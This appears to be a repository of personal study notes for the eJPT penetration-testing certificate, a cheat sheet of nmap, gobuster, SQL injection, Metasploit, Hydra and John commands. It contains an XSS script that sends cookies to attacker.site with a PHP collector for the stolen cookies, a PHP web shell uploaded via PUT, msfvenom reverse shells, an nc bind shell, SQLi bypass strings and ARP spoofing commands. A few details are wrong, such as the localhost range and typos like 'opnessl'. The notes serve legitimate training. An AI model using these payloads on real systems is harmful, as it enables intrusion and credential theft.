├── README.md
├── certHeader.png
└── fullNotes.md


/README.md:
--------------------------------------------------------------------------------
  1 | # eJPT Notes - eLearnSecurity Junior Penetration Tester Certificate Notes
  2 | ![Cert Header](certHeader.png)
  3 | 
  4 | ### NOTE
  5 | - **I am not -  affiliated with eLearnSecurity in any way and these notes do not guarantee that you pass.** 
  6 | - Replace 10.10.10.2 with the proper IP based on your situation
  7 | 
  8 | ## What is this?
  9 | - The notes below are **personal** notes I took while studying for eLearnSecurity's eJPT certificate in their Penetration Testing Student (PTS) course. 
 10 | 	- I passed on the first attempt in great part due to the labs and taking notes throughout. 
 11 | 
 12 | ## What this includes: 	
 13 | - Condensed Notes (below this section): Short notes with snippets in case you forget a command/ concept
 14 | - Full Notes: This includes explanations/ tidbits from the non-lab portions and can possibly help with general interview questions. 
 15 | 
 16 | ----
 17 | 
 18 | # Condensed Notes: 
 19 | 
 20 | ## Enumeration:
 21 | ### Ping Sweep:
 22 | - fping: `fping -a -g {IP RANGE} 2>/dev/null`
 23 | 	- EX: `fping -a -g 10.10.10.0/8 2>/dev/null`
 24 | - Nmap Ping Sweep: 
 25 | 	```
 26 | 	nmap -sn 10.10.10.0/8 | grep -oP '(?<=Nmap scan report for )[^ ]*'
 27 | 	```
 28 | 	
 29 | ### Nmap
 30 | - Full Scan (All Ports, Syn, Scripts, Version, Speed): 
 31 | 	```
 32 | 	nmap -Pn -T4 --open -sS -sC -sV --min-rate=1000 --max-retries=3 -p- -oN scanReportForHost2 10.10.10.2
 33 | 	```
 34 | 	- Replace `-sS` with `-sT` for full TCP 
 35 | 
 36 | - Quick Scan (WARNING NOT ALL PORTS): 
 37 | 	```
 38 | 	nmap -sC -sV 10.10.10.2
 39 | 	```
 40 | - IP Range: 
 41 | 	```
 42 | 	nmap -sC -sV 10.10.10.2-33
 43 | 	```
 44 | - Select IPs: 
 45 | 	```
 46 | 	nmap -sC -sV 10.10.10.2,3,6,9
 47 | 	```
 48 | - Vulnerability Scan for specific services:
 49 | 	```
 50 | 	nmap --script suspectedVulnScript(s)Here -p {PORT(s)} 10.10.10.2
 51 | 	```
 52 | 
 53 | - Shares Enumeration: 
 54 | 	```r
 55 | 	nbstat -A 10.10.10.2
 56 | 	nmblookup -A 10.10.10.2
 57 | 	smbclient //10.10.10.2/share -N # mounts share
 58 | 	smbclient -L //10.10.10.2 -N # lists shares and omits NetBIOS asking for a pss
 59 | 	enum4linux -a 10.10.10.2 
 60 | 	```
 61 | 
 62 | ### Banner Grabbing
 63 | - Netcat format: `nc {Target IP} {Port}`
 64 | - Netcat (HTTP Only):
 65 | 	```
 66 | 	nc 10.10.10.2 80  
 67 | 	HEAD / HTTP/1.0 #NOTE: PUT TWO EMPTY LINES AFTER! 
 68 | 					# EMPTY LINE HERE
 69 | 					# EMPTY LINE HERE AGAIN
 70 | 	```
 71 | - Netcat (See all available verb OPTIONS):
 72 | 	```
 73 | 	nc 10.10.10.2
 74 | 	OPTIONS / HTTP/1.0 
 75 | 	```
 76 | - OpenSSL (HTTPS)
 77 | 	```
 78 | 	opnessl s_client -connect 10.10.10.2:443
 79 | 	HEAD / HTTP/1.0
 80 | 	```
 81 | 
 82 | ### Wireshark Snippets
 83 | ```
 84 | request.method == "POST"     
 85 | http & ip.src == 192.168.0.1     
 86 | tcp.port == xx     
 87 | tcp.srcport == xx     
 88 | http.request
 89 | ```
 90 | - After capturing/ opening traffic:
 91 | 	- Follow -> TCP Stream
 92 | 
 93 | 
 94 | ## Web Enumeration
 95 | ### Web Scanning:
 96 | - Nikto - General Scan: 
 97 | 	```
 98 | 	nikto -h http://10.10.10.2/
 99 | 	```
100 | 
101 | ### Directory Traversal: 
102 | - gobuster (recommended):
103 | 	```
104 | 	gobuster dir -u http://10.10.10.2/ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt
105 | 	```
106 | - gobuster with auth and file extensions: 
107 | 	```
108 | 	gobuster dir -u http://10.10.10.2/ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -U admin -x /,php,txt,bak,old,html,xxx
109 | 	```
110 | 	- You might want to dial down the extensions `-x php,txt` based on the target you're after. In this case, we know the password for the user `-U admin`
111 | - dirb: 
112 | 	```
113 | 	dirb http://10.10.10.2/ /usr/share/wordlists/dirb/common.txt
114 | 	```
115 | - dirb with auth: 
116 | 	```
117 | 	http://targetsite.site/ -u "admin:password"
118 | 	```
119 | 
120 | ## Routing/ Pivoting:
121 | -   `route -n` (linux) - Clean routing table. Definitely use this when setting up a route, makes seeing the Destination and Gateway more clear!
122 | -   `arp -a` (linux/ windows) - Show you the ARP table, gateway, and iface
123 | -   `ip route` (linux) - Show you the routing setup you have
124 | - Add Route/ Pivot:
125 | 	- `ip route add` {CONNECT TO THIS NETWORK} `via` {FROM THIS IP}
126 | 	- `ip route add 10.10.10.0/8 via 10.10.10.99`
127 | 
128 | ---
129 | 
130 | ## Web Exploitation
131 | ### SQL Injection (SQLi):
132 | - Basic union injection (Manual): 
133 | 	```
134 | 	xxxx' UNION SELECT null; -- -
135 | 	```
136 | - Basic login bypass (Manual):
137 | 	```
138 | 	' or 1=1; -- -'  
139 | 	```
140 | 
141 | - SQLMap with a parameter:
142 | 	```bash
143 | 	sqlmap -u 'http://vuln.site/item.php?id=203' -p id --technique=U # Enum 'id' parameter and use the UNION technique
144 | 
145 | 	sqlmap -u http://10.10.10.2/item.php?id=203 --tables # Shows us all tables in the DB
146 | 
147 | 	```
148 | - SQLMap dump:
149 | 	```bash
150 | 	sqlmap -u 'http://vuln.site/view.php?id=203' --dump # has potential to take down servers in IRL situations
151 | 	```
152 | 
153 | ### Cross-Site Scripting (XSS):
154 | - Find a vulnerable input field: `<script>alert('Fight On!')</script>`
155 | - Steal cookie (helpful with stored-xss):
156 | 	```js
157 | 	<script\>
158 | 	var i \= new Image();
159 | 	i.src\="http://attacker.site/log.php?q="+document.cookie; 
160 | 	</script\>
161 | 	```
162 | ---
163 | ## Host Exploitation
164 | 
165 | ### ARP Spoofing
166 | ```py
167 | echo 1 > /proc/sys/net/ipv4/ip_forward # So once traffic reaches us, proceeds to the vicitm
168 | 
169 | arpspoof -i tap0 -t 10.10.10.2 -r 10.10.10.6
170 | ```
171 | 
172 | ### Metasploit
173 | - Basic Commands: 
174 | 	```r
175 | 	search xxxx 		# EX: search tomcat
176 | 	use xxxx 			# EX: use 1... or use itemNameHere
177 | 	set xxxx 			# Configure target IP and whatever required settings required for the module/ exploit 
178 | 	options, show options, advanced options xxxx #Shows you all options for the payload/ module you have set
179 | 	show payloads 		# In case you need to switch to a bind shell in cases where a revshell or go all out for a meterpreter shell
180 | 	select payload xxxx # To actually switch to whatever payload you want
181 | 
182 | 	```
183 | - Generate a payload:  
184 | 	```bash
185 | 	msfvenom -p php/reverse_php lhost={Attacker IP} lport=443 -o revShell.php # Basic php reverse shell
186 | 
187 | 	msfvenom -p linux/x64/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf # Linux reverse shell
188 | 
189 | 	```
190 | - Upgrade to a meterpreter shell:
191 | 	```bash
192 | 	use post/multi/manager/shell_to_meterpreter
193 | 	```
194 | - Meterpreter - Helpful Commands:
195 | 	```bash
196 | 	background
197 | 	session -l # Lists your open sessions
198 | 	sessions -i 3 # Interact with/ open/ enter session 3
199 | 	getsystem # PrivEsc for Windows
200 | 	sysinfo, ifconfig, route, getuid # Internal Enumeration
201 | 	download thisFile.txt /in/my/directory/here
202 | 	hashdump # Dumps Windows SAM password hashes  
203 | 	```
204 | 
205 | ### Netcat Listener
206 | ```
207 | nc -nvlp 8888 # Listening on port 8888
208 | ```
209 | ### Passwords
210 | - Prepare a file for John the Ripper to crack:
211 | 	```
212 | 	unshadow passwd shadow > crackThisPls
213 | 	```
214 | - Crack the passwords with John: 
215 | 	```
216 | 	john --wordlist=/my/wordlist/is/here.txt crackThisPls
217 | 	```
218 | - Brute-force with Hydra:
219 | 	- Change ssh/ telnet to the service you are targeting
220 | 	```r
221 | 	hydra -L usersList.txt -P passList.txt -t 10 10.10.10.2 ssh -s 22 
222 | 	
223 | 	hydra -L usersList -P passList telnet://10.10.10.2 -V # verbose so you see real-time when a password is found
224 | 	```
225 | 
226 | ---
227 | ## Last Minute Reminders
228 | - Once you compromise a box, cat the /etc/hosts file or it's equivalent to find other hosts. This was crucial in the labs. 
229 | - You MUST do a full port scan, do not hurry, the labs had some ports without a full scan you would have missed. 
230 | 	- T5 speed on nmap omits some ports for me, your experience may vary, I think sticking to T4 or less is wise. 
231 | - For web: After you get some creds, try to pipe them into gobuster for an authenticated traversal.
232 | - If nmap's service version scan (-sV) is of no help, grab the banner with nc
233 | - If SQLi does not work right away, try appending commands instead of using a boolean:
234 | 	-    Instead of `page?id=21' or 1=1 -- -`, insert the next statement directly, `page?id=21 AND SELECT ...`
235 | - Let gobuster run for a while, and run dirb as well and have it run for a while too, in case one of them does not catch a directory. 
236 | - Again, seriously do not hurry and miss things out. 
237 | - Enumerate! Enumerate! Enumerate! Everything. Every directory, file, if you get stuck. 
238 | 
239 | ---
240 | ## Helpful Cheatsheets
241 | - SQL Union Injections (If you want to do the injection manually, it's actually fun!): https://medium.com/@nyomanpradipta120/sql-injection-union-attack-9c10de1a5635 
242 | - Basic SQL Injection for Authentication Bypass: https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/\
243 | - TTY Shells:  https://netsec.ws/?p=337
244 | 
245 | 
246 | 	
247 | 


--------------------------------------------------------------------------------
/certHeader.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/osV22/ejpt_notes/50c0d359c4038819ae16504bf56c1b7dd7e4496a/certHeader.png


--------------------------------------------------------------------------------
/fullNotes.md:
--------------------------------------------------------------------------------
  1 | # Full Notes
  2 | - Includes some common knowledge items that might come up in interviews and good to just be aware of in general. 
  3 | 
  4 | ## Introduction
  5 | ### HTTP(s) Sniffing w/ Wireshark
  6 | - Helpful Snippets:
  7 |   - `request.method == "POST"` 
  8 |   - `http & ip.src == 192.168.0.1`
  9 |   - `tcp.port == xx`
 10 |   - `tcp.srcport == xx`
 11 |   - `http.request`
 12 | - After Capturing 
 13 |   - `Follow` - > `TCP Stream`
 14 | 
 15 | ### OSI Model
 16 | - Each layer serves the layer **above** it
 17 | - Through the process of encapsulation, the lower layer passes off its payload as the **HEADER** AND **PAYLOAD** for the upper layer... That lower layer's header is what directs it to go up.
 18 |   
 19 | ### Networking
 20 | - Reserved IPv4 Addresses
 21 |   - `0.0.0.0` - `0.255.255.255` represent "THIS network"
 22 |   - `127.0.0.0` - `128.255.255.255` represent the local host (your pc)
 23 |   - `192.168.0.0` - `192.168.255.255` reserved for private networks
 24 | - Check listening ports and current TCP connections
 25 |   - `netstat -ano` on windows
 26 |   - `netstat -tunp` on linux
 27 |   - `netstat -p tcp -p udp lsof -n -i4TCP -i4UDP on MacOS` (Yes, really typed like that...)
 28 |   
 29 | #### Gateway, Subnet...etc
 30 | - To identify a host, you need BOTH the IP Address AND the netmask to tap its network
 31 | - To get subnet size/ CIDR, take the netmask and convert it to binary... Count how many "1" bits are in a row and that will be the total /19 or /24 ... 
 32 | - EX: `10.54.12.0/24` (10.54.12.0/255.255.255.0)
 33 |   - `255` in binary has 8 "1" bits. So if we do 2^8, we get the number of addresses at that subnet which is 256 addresses.
 34 | -  `10.54.12.0` is the network address or `Gateway`/ router
 35 | -  `10.54.12.255` is the `BROADCAST` address
 36 |  
 37 | #### Routing
 38 | - Default Address of `0.0.0.0` is used when the router receives a packet whose destination is an `UNKNOWN` network
 39 | - Helpful Snippets:
 40 |   - `ip neighbour` (linux to get the ARP cache)
 41 |   - `arp -a` (linux + windows ARP table)
 42 |   - `ip route` Linux Routing Table
 43 |   - `route print` on windows
 44 |   - `netstat -r` on OSX
 45 | - Switches without VLANs DO NOT segment networks, routers can be used to segment them if need be
 46 | - Devices to watch out for to pivot/ route
 47 |   - Printers, fileserver, web server, or anything like that in the ARP table
 48 | - If stuck on the exam, Full Stack Analysis with Wireshark touches on finding other routers with Wireshark
 49 | - Add Route Example
 50 |     - Our `tap0` VPN IP: `10.175.34.100`
 51 |     - Target Machine IP: `192.168.222.199`
 52 |     - Target Network: `192.168.222.0/24`
 53 |     - Our Gateway IP (`tap0` vpn ip to match other servers there): `10.175.34.1`
 54 |   - Query to add: 
 55 |     - `ip route add {TARGET NETWORK} via {OUR NETWORK} dev {vpn interface}`
 56 |     - `ip route add 192.168.222.0/24 via 10.175.34.1 dev tap0`
 57 |     - call, `ip r` and you will see it added to our ip table and you can access it now!
 58 |     - Other Queries also working: 
 59 |       - `ip route add {TARGET NETWORK} via {OUR NETWORK}`
 60 |  
 61 | #### Firewalls
 62 | - Firewalls have filters packets through the following actions
 63 |   - `Allow`: packet is able to pass
 64 |   - `Drop`: Drops the packet without an error message or anything to the source
 65 |   - `Deny`: Deny passage WITH an error message
 66 | - IMPORTANT - Interview-Esque Questions
 67 |     - Typical firewalls can ONLY filter traffic by IP addresses, ports, and protocols
 68 |     - Layer 7 (Application Layer) firewalls are able to inspect content and do more than traditional Firewalls
 69 |     - Firewalls can also be used to implement NAT 
 70 |     - In DNS, it's the RESOLVER SERVER which actually translates things through the Domain Name System. So the resolver is the server that does that operation and is hosted by your isp or whoever, like openDNS or whatever you use.
 71 |  
 72 | ### Wireshark Helpful Snippets
 73 | - Note: These are like classes... sort of. So you can do ip.**addr** ip.xyz
 74 |   - `http.request.method == GET`
 75 |   - `tcp.stream eq 0` (will show the first tcp stream, if we change it 1 it will show us a whole different stream if available.)
 76 |   
 77 |  
 78 | - VIEW -> Menu Resolution  -> Enable Mac Layer - Shows you the mac addresses and is helpful in trying to find other devices/ routers. Do arp filter then check on it.
 79 |  - A - Record  or A in DNS is the (Host Address). So if we capture DNS data we can see the type of the request sometimes is of type: A (Host Address), it is literally an IP of the machine.
 80 | - To see just successful ports egress check
 81 |     - `tcp.seq==1 and tcp.ack==1` - fast way to check inbound/ outbound during an egress check, use this in Wireshark after capturing the traffic
 82 | 
 83 | ### Web & Cookies
 84 | - Using console and cannot use BurpSuite:
 85 |   - EX: `openssl s_client -connect targetSite.com:443`
 86 |   - flag `-quiet` to stop it from using verbose mode
 87 |   - Once connected we can do OPTIONS to see what's allowed, PUT can allow us to put a shell on the target
 88 | 
 89 | - Standard Cookies (local/ client-side)
 90 |   - If cookie domain is not specified it will be restricted to just the immediate server and will not pass to other sub.domains.com.
 91 |   - Adding `http.only` flag when setting up a cookie protects against XSS and other attacks that might allow reading of that cookie.
 92 |   - Adding a `secure` flag in a cookie will only send cookies on HTTPS connections
 93 |   - When hijacking cookies, first make an init request to have the site generate us a cookie, **THEN** we can manipulate that and insert our own before submitting a GET request to the site with the weaponized cookie
 94 | 
 95 | - Session Cookies (server-side)
 96 |   - Slightly less secure to hide some of how the site functions, token-based
 97 |   - Can be submitted through GET links, EX: https://coolsite.com/index.php&sessid=kw3r9
 98 |   - PHP Sites use: `PHPSESSID`
 99 |   - JSP Sites use: `JSESSIONID`
100 |   - **Web dev can set their own custom parameters though instead of the examples above for PHP & JSP.**
101 |   - So biggest difference between HTTP and HTTPS are within the SSL/TLS handshake
102 |  
103 | ----------------
104 | ## Penetration Testing 
105 | ### Information Gathering & Scanning
106 | - Subdomain Enumeration 
107 |   - `cert.sh` - By far the best, a website that outputs TONS of subdomains based on certs domain checks
108 |   - Go to a target site's cert details in the browser, it will show other subdomains as well if it's a shared cert
109 |     - Careful from wildcard certs as they will return a subdomain for anything searched/ queried. Ex: notrealsub.google.com will return valid if wildcard cert is on it.
110 |   - Use Sublist3r or `dnsdumpster.com`
111 |   - `VirusTotal.com` search for a domain 
112 | 
113 | - Ping Sweep: Used to create a map of a network
114 |   - IMPORTANT: Use two tools to confirm everything is good, fping AND nmap. Nmap, if you don't need output remove /dev/null
115 |   - nmap is the defacto choice, as it allows you to input a list of ip ranges and much more
116 |     - `nmap -sn 10.10.10.3-222`    
117 |     - To force nmap os detection of a host even if it returns an error, try nmap -Pn -O TARGETIP (Note: This is very noisy)
118 |     - More accurate OS scan: `nmap -sT -O TARGETIP/Range` (SYN-TCP based)
119 |   - `fping -a -g IPRANGE`
120 |     - `-a` flag, we want to see only hosts that are available (alive)
121 |     - `-g` flag, we want this a ping sweep and not a standard ping request
122 |     - To hide offline hosts error messages use `2>/dev/null` at the end of the command ex: `fping -a -g 10.10.10.2 10.10.10.222 2>/dev/null` will show us only valid and alive hosts (CAN BACKFIRE, sometimes skips hosts with all ports closed)
123 | 
124 | - Port Scanning
125 |   - `-sS` flag - Stealth scanning in nmap is decent against firewalls but can still be detected by some IDS. It's a SYN scan that drops the 3-handshake communication before connecting, which makes the service on the port unable of detecting it. 
126 |   - `nmap <scan type> 10.10.10.3,6,9` will only scan hosts 10.10.10.3 then ...10.6 ... 10.9
127 |   - DO NOT give up on `filtered` ports (request is blocked by FW/ IDS), try to force them with `-Pn`
128 | 
129 | ### Vulnerability Assessment
130 | - Much more linear than pentesting and less effective as we have no way to prove those vulns are actually exploitable
131 |   - Scan probes to verify a vuln is **can lead to false positives**
132 | - Typical approach (rather than cycle): Engagement -> Information Gathering -> Footprinting & Scanning -> Vulnerability Assessment -> Reporting
133 | - Assessments on custom applications are more arduous as you have to more manual work than running several scanners
134 | 
135 | ### Web Attacks
136 | - Banner grabbing: 
137 |   - Can be obfuscated as admins can change the banner info. That's where automated tools like httprint excel, it will pick that up (signature-based)
138 |   - Netcat (Manual: HTTP-ONLY)
139 |     ```bash
140 |     nc <target address> 80 
141 |     HEAD / HTTP/1.0` #NOTE: PUT TWO EMPTY LINES AFTER! Also make sure the request is in UPPERCASE
142 |     
143 |     
144 |     ```
145 |    - If the banner grab is unsuccessful, it's probably because you left out the two extra empty lines after the request HEAD... that being the two empty lines after which the body goes if we had any.
146 |       - Sometimes might get lucky and get even OS running on that server
147 |   - OpenSSL (Manual: HTTPS) 
148 |     - `openssl s_client -connect target.site:443`
149 |     - `HEAD / HTTP/1.0`
150 |   - httprint (Automated)
151 |     ```bash
152 |     httprint -P0 -h <target hosts> -s <signature files>
153 |     httprint -P0 -h 1.2.3.4 -s /usr/share/httprint/signatures.txt #Example 
154 |     ```
155 | - HTTP Verbs
156 |   - `OPTIONS` gives us enabled HTTP verbs on the host
157 |   - **IMPORTANT: REST APIs use PUT/ DELETE to save files as normal operations, so do not report *ANY* verbs found without veryfing their impact**  
158 |   - `PUT` is the most dangerous as it uploads files to a server. **NOTE: Must write the correct size of the uploaded content**
159 |     ```bash 
160 |       PUT /path/to/destination HTTP/1.1
161 |       Host: www.website.com
162 |       
163 |       
164 |       <PUT data> 
165 |     ```
166 |     ```bash 
167 |       # Example
168 |       nc vicitm.site 80
169 |       PUT /payload.php HTTP/1.0
170 |       Content-type: text/html
171 |       Content-length: 20 # NOTE: You have to have know length of the contents before sending, wc -m payload.php gives us length in bytes
172 |     ```
173 |     - Great shell that works with `PUT`: 
174 |       ```php
175 |       <?php 
176 |       if (isset($_GET['cmd']))
177 |       {
178 |         $cmd = $_GET['cmd'];
179 |         echo '<pre>';
180 |         $result = shell_exec($cmd);
181 |         echo $result;
182 |         echo '<pre>';
183 |       }
184 |       ?>
185 |       ```
186 |       - We can now send requests on the site with `victim.site/shellweUploaded?cmd=cat /etc/passwd`
187 |   - `Delete` is another dangerous verb to lookout for - Deletes files off a server (DoS/ Data Loss)
188 |     ```bash 
189 |       DELETE /path/login.php HTTP/1.1 
190 |       Host: www.website.com
191 |     ```
192 |   - `POST` parameters (form data) only work in the **message body**
193 | - XSS: stealing cookie content and sending it to an attacker
194 |   - XSS to insert on target: 
195 |     ```html
196 |     <script>
197 |     var i = new Image();
198 |     i.src="http://attacker.site/log.php?q="+document.cookie; 
199 |     </script>
200 |     ```
201 |   - PHP script to store captured data on our c2:
202 |     ```php
203 |     <?PHP
204 |     $filename="/tmp/log.txt"; // Where to save, this file should be already created on our c2
205 |     $fp=fopen($filename, 'a'); 
206 |     $cookie=$_GET['q']; // the parameter to store the cookies/ whatever command we need into
207 |     fwrite($fp, $cookie);
208 |     fclose($fp);
209 |     ?>
210 |     ```
211 | 
212 | ### Passwords
213 | - John the Ripper
214 |   - `unshadow passwd shadow > crackme` - Sets the pass/ shadow in a format john will accept to begin cracking on crackme
215 |   - `john --wordlist=/usr/share/SecLists/Passwords.txt --pot=hashestocrack hashestocrack` - Will overwrite the john pot file in case you want to run multiple attempts on the same file in the same session.
216 |   - `john --incremental --users:<list of users or just one EX: Brian> crackme` - NOTE: Incremental is not meant to be used with a wordlist and will attempt typical brute-force. Will only attempt specified users instead of going through all. 
217 |   - `john --wordlist --users:victim1,victim2 crackme` - Uses default wordlist for a dictionary attack
218 |     - `john --wordlist=/usr/share/wordlist/rockyou.txt --users:vitcim1 crackme` - Using custom wordlists
219 |     
220 | ### NetBIOS
221 | - Why is NetBIOS great to enumerate? Gives us information about: 
222 |   - **Network Shares**
223 |   - Hostname
224 |   - NetBIOS name
225 |   - Domain
226 | - `\\ComputerName\C$` - allows us to access a disk volume on the share. (C$, D$, E$...)
227 | - `\\ComputerName\admin$` - Gives us the Windows installation directory
228 | - `\\ComputerName\ipc$` - (Can't be viewed in explorer, stick to the terminal) Taps/ communicates directly with processes running on that network. For a null session: `net use \\<IP ADDRESS>\IPC$ "" /user:`
229 | - Enumeration
230 |   - `nbstat -A 10.10.10.222` 
231 |   - `<00>` - Means that this machine is a CLIENT
232 |   - `<20>` - Means file sharing is enabled on that machine. Enumerate it further, this is of most importance.
233 |     - `NET VIEW <TARGET MACHINE IP>` - To enumerate the file sharing on that machine
234 |     - NOTE: To enumerate on linux use `nmblookup -A 10.10.10.222` or even better, `smbclient -L \\10.10.10.222 -N` where flag `-N` is to omit NetBIOS requesting a password
235 |   - `UNIQUE` - Means that machine can have only 1 IP assigned to it
236 | - `enum4linux -n 10.10.10.222`
237 | - `nmap -script=smb-brute 10.10.10.222` - Quickly gives us a login and password for users
238 | 
239 | ### Meterpreter
240 | - `reverse_tcp` - Will attempt to connect back to our (attacking) machine. (Helps evade FW, if you choose the right port)
241 | - `bind_tcp` - Creates a server-process on the victim machine waiting for us to connect to it. 
242 | - When navigating a Win machine, make sure to escape the `\`, so instead of `cd C:\` it should be: `cd C:\\`
243 | - Popular commands:
244 |   - `route` (IMPORTANT) - Gateway info and routes
245 |   - `getsystem` - Automatic PrivEsc, if possible. Won't work in modern Win machines, use `bypassuac` instead which is a separate exploit (Set session to background, then set bypassuac, afterward attempt getsystem again).
246 |   
247 | ### Helpful Commands
248 | - `nmap -sn 10.10.10.22/24 | grep -oP '(?<=Nmap scan report for )[^ ]*'` Clean nmap ping sweep - WARNING: can omit some alive hosts out
249 | - `nc -v 127.0.0.1 8888` will let us contact a listening port on the target address here localhost. This is not to be confused with the listener we typically use in reverse shells `nc nvlp 8888`. The first command is used to call the second command and establish a connection.
250 | - For a simple shell if the target host has nc:
251 |   - On target host: `nc -nvlp 1337 -e /bin/bash` where `-e` executes any command.
252 |   - On our machine: `nc -v 127.0.0.1 1337` of course, instead of localhost, insert the target IP.
253 | - SQLi:
254 |   - `' UNION SELECT null; -- -` - Basic union injection, extra dash to avoid browsers removing trailing space. Of course, keep adding nulls till we get a result.
255 |   - SQLMAP: `sqlmap -u 'http://vuln.site/view.php?id=203' -p id --technique=U` - Enum id parameter and use UNIONs
256 |   - `substring('entry', x, y)` - Used as a boolean if `' or 1=1` or alternatives are blocked where x = index/ position of char, and y = length of entry (1 per word/ entry).
257 |     - This is really used for predicting DB names and enumerating them by hand, instead SQL does all this work for us. 
258 |     - EX: User if user() = root@localhost is signed into the DB, we can check that:
259 |       - `SELECT substring(user(), 1, 1)` Returns `1` if root is signed in
260 |   - `user()` - Tells us current user logged into the DB
261 | - Hydra
262 |   - HTTP-POST login dictionary `hydra crackme.site http-post-form "/login.php:usr=^USER^&pwd=^PASS^:invalid credentials" -L /usr/share/wordlist.txt -P /usr/share/passList.txt -f -V`, where flag `-f` is to stop the attack as soon as we find one successful result,
263 |   - SSH Attack `hydra 10.10.10.222 ssh -L /usr/share/userList.txt -P /usr/share/passList.txt -f -V`
264 | - Port forward: `echo 1 > /proc/sys/net/ipv4/ip_forward`
265 | - Arpspoof: `arpspoof -i <interface> -t <target ip> -r <host ip>`, NOTE: `-t` address is the source ip (often the victim) and the `-r` is the destination ip. In a MiTM, we are between them. 
266 |   - `arpspoof -i eth0 -t 10.10.10.222 -r 10.10.10.240` - Will intercept traffic in that .222-240 range, this is where Wireshark would be of great help. 
267 | - To confirm a blind RCE, you can use a time test out if you really have RCE. Ex: send `sleep+5` and see if the request takes 5 seconds to come back in burp.
268 | - `msfvenom -p linux/x64/shell/reverse_tcp lhost=<Attacker IP> lport=443 -f elf -o 443` - Simple msfvenom reverse shell
269 | - `msfvenom -p php/reverse_php lhost=<Attacker IP> lport=443 -o revShell.php` - Simple php reverse shell, use with metasploit to get meterpreter later on if possible. 
270 |   - `use post/multi/manager/shell_to_meterpreter` - To upgrade from a simple shell 
271 |     
272 | ### Good to Know
273 | - When testing for SQLi, don't just stop at the web UI once you find an injection, use burp to inject into: 
274 |   - Headers
275 |   - Cookies
276 |   - POST: Helps circumvent client-side input validation
277 | - Use scp to download files to our local machine: `scp root@10.10.10.222:/etc/passwd .` - where root=victim along with the victim ip
278 | - SQLi can also allow us to nuke DBs where we are allowed to delete things, insert a true statement and the DB will be nuked.
279 |  - UNION SQLi is faster and is less prone to crashing the system. So when running SQLMap, try to select a technique instead of leaving it empty which can possibly crash the target host
280 |  - A full dump can also crash the system, so dump only specific tables/ columns to be less noisy
281 | - Backups are typically stored in .bak, .old, .txt, and .xxx. So if we want to find any backups on a site run gobuster against those.c
282 | - Directory Enumeration
283 |   - If gobuster/ dirb are being blocked, you might need a User Agent to emulate browser traffic and snag some dirs. Ex: `dirb http://targetsite.site -a "Mozilla/ browser agent we copied from an online source"`
284 |   - Adding a cookie can give more results with gobuster/ dirbuster. EX: `dirb http://targetsite.site -c "COOKIE:XYZ"` copy the 
285 |   - Adding a basic auth can also bring up more results `-U` in gobuster, and in dirb: `dirb http://targetsite.site -u "admin:password"`
286 |   - `-x txt,php,/` to include directories with the file extensions search in gobuster
287 | 
288 | ### Important Last Minute Reminders:
289 | - Once you compromise a machine, cat the /etc/hosts to find any virtual hosts you might need later on. Was crucial in the labs. 
290 | - MUST do a full port scan with nmap, the labs had many with some close the 65k ports.
291 |  - Very fast nmap scan for full ports `sudo nmap -T4 --open -sS --min-rate=1000 --max-retries=2 -p- -oN full-scan 10.10.10.x` T5 is not much faster and risks skipping some ports. 
292 | - For web: After you get some creds, try to pipe them into gobuster for an authenticated traversal. 
293 | - Make sure to keep your machine's new IP in mind when scanning. As dumb as it might sound, it can trip you up after a few boxes. 
294 | - To see just successful ports with an egress check:
295 |   - `tcp.seq==1 and tcp.ack==1` - fast way to filter outbound requests during an egress check, **after** capturing the traffic with Wireshark, etc.
296 | - When doing a scan, if a host has **ALL** ports closed, it's a **CLIENT** 
297 | - When scanning for service versions, to get more information about the operating system and such, grab the banner for that open port with nc.
298 | - If SQLi does not work right away, try appending commends instead of using a boolean:
299 |   - Instead of `page?id=21' or 1=1 -- -`, insert the next statement directly, `page?id=21 AND SELECT ...`
300 | - If a specific dictionary list is giving you troubles with Hydra-particularly, check if the list has a comment on top and remove it.
301 | 


--------------------------------------------------------------------------------